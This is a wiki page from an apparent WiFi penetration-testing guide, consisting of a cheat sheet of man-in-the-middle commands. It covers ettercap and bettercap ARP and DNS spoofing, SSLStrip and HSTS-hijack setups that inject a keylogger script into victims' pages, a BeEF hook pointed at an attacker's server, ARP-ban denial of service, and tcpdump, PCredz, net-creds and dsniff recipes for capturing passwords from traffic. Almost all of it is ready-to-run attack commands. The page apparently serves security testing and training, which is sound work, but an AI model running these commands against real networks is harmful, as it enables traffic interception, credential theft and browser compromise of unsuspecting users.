-
Notifications
You must be signed in to change notification settings - Fork 185
MitM Commands
Koutto edited this page Nov 1, 2020
·
1 revision
ifconfig wlan0 10.0.0.1 up netmask 255.255.255.0
sysctl -w net.ipv4.ip_forward=1
ettercap -T -q -i <interface> -w dump -M ARP /<ip_target>/ /<ip_gateway>/
Note: Do not forget to enable routing, otherwise it will cut internet connection for targets.
bettercap -caplet https-ui -iface <interface>
net.recon on # Periodically read ARP table in order to detect new hosts on LAN
net.probe on # Send different types of probes to each IP in current subnet
IMPORTANT: net.probe
MUST be put OFF before doing arp.spoof on
(otherwise conflicts !)
Ref: https://www.bettercap.org/
arp.spoof off
net.probe off # IMPORTANT: Avoid conflict with ARP spoofing
set arp.spoof.targets <IP_target> # support IP addres / IP ranges/ MAC address
set arp.spoof.internal true # Enable ARP spoofing on internal network
arp.spoof on
dns.spoof off
set dns.spoof.domains <domain1>,<domain2>,...
set dns.spoof.address <Target address>
set dns.spoof.all true # Spoof entire subnet
dns.spoof on
Important: It is also required to ARP spoof subnet or the target !
net.sniff off
set net.sniff.local true
set net.sniff.verbose 'true'
set net.sniff.output 'capture.pcap'
net.sniff on
net.sniff off
set net.sniff.local true
set net.sniff.regexp '.*password=.+'
set net.sniff.verbose 'true'
set net.sniff.output 'passwords.pcap'
net.sniff on
net.probe off
arp.spoof off
http.proxy off
set http.proxy.sslstrip true # SSLStrip will only work on HTTPS website without HSTS
set net.sniff.verbose false
set arp.spoof.targets <IP_target>
hstshijack/hstshijack # Use caplet hstshijack that bypass HSTS when misconfigured
arp.spoof on
http.proxy on
net.sniff on
HSTS can be bypassed when:
- Server's domain has not been added to the HSTS preload list with the IncludeSubdomains attribute set.
- Server replies with HSTS headers, but without IncludeSubdomains attribute set.
set hstshijack.log /usr/share/bettercap/caplets/hstshijack/ssl.log
set hstshijack.ignore *
set hstshijack.targets twitter.com,*.twitter.com,facebook.com,*.facebook.com,apple.com,*.apple.com,ebay.com,*.ebay.com,www.linkedin.com
set hstshijack.replacements twitter.corn,*.twitter.corn,facebook.corn,*.facebook.corn,apple.corn,*.apple.corn,ebay.corn,*.ebay.corn,linkedin.com
set hstshijack.obfuscate false
set hstshijack.encode false
set hstshijack.payloads *:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js
set http.proxy.script /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set dns.spoof.domains twitter.corn,*.twitter.corn,facebook.corn,*.facebook.corn,apple.corn,*.apple.corn,ebay.corn,*.ebay.corn,linkedin.com
http.proxy on
dns.spoof on
-
Start Beef service
-
Edit caplets/beef-inject.js with attacker's IP:
'<script type="text/javascript" src="http://<YOUR_SERVER>:3000/hook.js"></script></head>'
- Run bettercap commands:
net.probe off
arp.spoof off
http.proxy off
set arp.spoof.targets <IP_target>
beef-active
net.probe off
arp.spoof off
set arp.spoof.targets <IP_target>
arp.ban on
- Sniff anything on one interface:
tcpdump -i <interface>
- Filtering on host (source/destination/any):
tcpdump -i <interface> host <IP>
tcpdump -i <interface> src host <IP>
tcpdump -i <interface> dst host <IP>
tcpdump -i <interface> ether host <MAC>
tcpdump -i <interface> ether src host <MAC>
tcpdump -i <interface> ether dst host <MAC>
- Filtering on port (source/destination/any):
tcpdump -i <interface> port <port>
tcpdump -i <interface> src port <port>
tcpdump -i <interface> dst port <port>
- Filtering on network (e.g. network=192.168)
tcpdump -i <interface> net <network>
tcpdump -i <interface> src net <network>
tcpdump -i <interface> dst net <network>
- Protocol filtering
tcpdump -i <interface> arp
tcpdump -i <interface> ip
tcpdump -i <interface> tcp
tcpdump -i <interface> udp
tcpdump -i <interface> icmp
- Condition usage example
tcpdump -i <interface> '((tcp) and (port 80) and ((dst host 192.168.1.254) or (dst host 192.168.1.200)))'
- Disable name resolution
tcpdump -i <interface> -n
- Make sure to capture whole packet (no truncation)
tcpdump -i <interface> -s 0
- Write full pcap file
tcpdump -i <interface> -s 0 -w capture.pcap
- Show DNS traffic
tcpdump -i <interface> -nn -l udp port 53
- Show HTTP User-Agent & Hosts
tcpdump -i <interface> -nn -l -A -s1500 | egrep -i 'User-Agent:|Host:'
- Show HTTP Requests & Hosts
tcpdump -i <interface> -nn -l -s 0 -v | egrep -i "POST /|GET /|Host:"
- Show email recipients
tcpdump -i <interface> -nn -l port 25 | egrep -i 'MAIL FROM\|RCPT TO'
- Show FTP data
tcpdump -i <interface> -nn -v port ftp or ftp-data
- Show all passwords different protocols
tcpdump -i wlan0 port http or port ftp or port smtp or port imap or port pop3 or port telnet -l -A | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '
- With PCredz:
./Pcredz -f <pcapfile> # extract credentials from a pcap file
./Pcredz -i <interface> -v # extract credentials from a live packet capture on a network interface
- With net-creds:
python net-creds.py -p <pcapfile>
python net-creds.py -i <interface>
- With dsniff:
dsniff -p <pcapfile>
dsniff -i <interface>
- URLs sniffing with urlsnarf:
urlsnarf -p <pcapfile>
urlsnarf -i <interface>
- 01. WiFi Basics
- 02. 802.11 Specifications
- 03. WPS (WiFi Protected Setup)
- 04. WPA Protocol Overview
- 05. WPA/WPA2 Personal (PSK) Authentication
- 06. WPA/WPA2 PSK Traffic Decryption
- 07. WPA/WPA2 Enterprise (MGT)
- 08. Evil Twin Attacks
- 09. 802.11 Network Selection Algorithms
- 01. WiFi Interfaces Management
- 02. WiFi Connection
- 03. WiFi Monitoring (Passive Scanning)
- 04. Hotspot Captive Portal Bypass
- 05. WiFi Denial of Service
- 06. WEP Authentication Cracking
- 07. WPA/WPA2 Personal (PSK) Authentication Cracking
- 08. WPA/WPA2 Enterprise (MGT) Authentication Cracking
- 09. WPA/WPA2 Personal (PSK) Traffic Decryption
- 10. Basic AP (Manual Configuration)
- 11. Open Network (no passphrase) Rogue AP / Evil Twin
- 12. WPA/WPA2 Personal (PSK) Rogue AP / Evil Twin
- 13. WPA/WPA2 Enterprise (MGT) Rogue AP / Evil Twin